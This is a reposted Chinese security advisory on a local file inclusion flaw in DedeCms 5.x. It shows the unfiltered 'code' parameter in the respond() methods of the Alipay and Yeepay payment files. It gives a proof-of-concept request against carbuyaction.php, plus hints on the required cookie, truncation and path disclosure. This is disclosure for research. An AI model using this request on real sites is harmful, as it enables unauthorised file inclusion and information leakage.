DedeCms 5.x 本地文件包含漏洞(respond方法)

漏洞版本:
DedeCms 5.x
漏洞描述:
DedeCms是免费的PHP网站内容管理系统。

plus/carbuyaction.php里没有对变量进行严格的过滤

出现漏洞的两个文件为:
Include/payment/alipay.php
Include/payment/yeepay.php
漏洞均出现在respond方法里

Include/payment/alipay.php
  1. ......
  2. function respond()
  3. {
  4. if(!empty($_POST))
  5. {
  6. foreach($_POST as $key => $data)
  7. {
  8. $_GET[$key]= $data;
  9. }
  10. }
  11. /* 引入配置文件 */
  12. require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
  13. ......
大概在133行左右,$_GET[‘code’]没有经过任何判断和过滤。 Include/payment/yeepay.php
  1. ......
  2. function respond()
  3. {
  4. /* 引入配置文件 */
  5. require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';
  6. $p1_MerId = trim($payment['yp_account']);
  7. $merchantKey = trim($payment['yp_key']);
  8. ......
大概在145行左右,$_REQUEST['code']没有经过任何判断和过滤。
测试方法:
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. http://www.php0day.com/plus/carbuyaction.php?dopost=return&code=http://www.cnblogs.com/tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断,使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie
  2.  
  3. 由于bankcod这两个文件并没有respond方法,所以如果code等于bank或者cod时将会暴错泄露路径
Sebug安全建议:
厂商补丁:

dedecms
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dedecms.com/products/dedecms/

转载于:https://www.cnblogs.com/security4399/archive/2013/03/30/2990018.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值